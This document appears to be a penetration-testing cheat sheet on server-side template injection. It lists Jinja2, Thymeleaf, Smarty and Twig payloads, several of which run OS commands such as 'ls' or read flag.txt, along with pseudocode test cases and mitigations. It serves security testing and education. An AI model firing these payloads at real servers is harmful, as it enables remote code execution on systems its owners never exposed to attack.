SSTI

http://IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

Description

Server-Side Template Injection (SSTI) occurs when user input is embedded directly into a server-side template, allowing attackers to inject and execute arbitrary code on the server.

Example with Scenario

Scenario: A web application uses a template engine to render web pages, and it incorporates user input directly into the template without proper sanitization. An attacker can craft malicious input to manipulate the template engine and execute arbitrary code.

Payloads and Test Cases

Payloads

1. Jinja2 (Python):

   Copy

   {{ 7*7 }}
   {{ config.items() }}

2. Thymeleaf (Java):

   Copy

   ${T(java.lang.Runtime).getRuntime().exec("ls")}

3. Smarty (PHP):

   Copy

   {$smarty.version}
   {php}echo `ls`;{/php}

4. Twig (PHP):

   Copy

   {{ 7*7 }}
   {{ system('ls') }}

Test Cases

1. Jinja2 (Python):

   • Payload:

     Copy

     {{ 7*7 }}
     {{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("{{ 7*7 }}")
     # Verify if the template rendered the expression correctly
     checkResponseForValue("49")
     
     sendPayloadToServer("{{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}")
     # Verify if the command executed correctly
     checkResponseForCommandExecution("ls")

2. Thymeleaf (Java):

   • Payload:

     Copy

     ${7*7}
     ${T(java.lang.Runtime).getRuntime().exec("ls")}

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer("${7*7}")
     // Verify if the template rendered the expression correctly
     checkResponseForValue("49")
     
     sendPayloadToServer("${T(java.lang.Runtime).getRuntime().exec('ls')}")
     // Verify if the command executed correctly
     checkResponseForCommandExecution("ls")

3. Smarty (PHP):

   • Payload:

     Copy

     {$smarty.version}
     {php}echo `ls`;{/php}

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer("{$smarty.version}")
     // Verify if the template rendered the expression correctly
     checkResponseForSmartyVersion()
     
     sendPayloadToServer("{php}echo `ls`;{/php}")
     // Verify if the command executed correctly
     checkResponseForCommandExecution("ls")

4. Twig (PHP):

   • Payload:

     Copy

     {{ 7*7 }}
     {{ system('ls') }}

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer("{{ 7*7 }}")
     // Verify if the template rendered the expression correctly
     checkResponseForValue("49")
     
     sendPayloadToServer("{{ system('ls') }}")
     // Verify if the command executed correctly
     checkResponseForCommandExecution("ls")

Mitigation

1. Input Sanitization:

   • Sanitize user input to ensure it does not contain malicious code.

   • Use escaping functions to properly escape user input before embedding it in templates.

2. Use Safe Template Engines:

   • Use template engines that do not allow arbitrary code execution or have strict separation between logic and presentation.

   • Configure template engines to disable or restrict dynamic code execution features.

3. Content Security Policy (CSP):

   • Implement a strict Content Security Policy to limit the sources from which content can be loaded.

   • Use CSP to prevent the execution of inline scripts and styles.

4. Whitelist Allowable Expressions:

   • Define and enforce a whitelist of allowable template expressions.

   • Restrict the use of dynamic expressions and variables within templates.

5. Security Testing:

   • Conduct regular security testing, including fuzzing and penetration testing, to identify and mitigate SSTI vulnerabilities.

   • Use automated security tools to detect and prevent SSTI vulnerabilities in your codebase.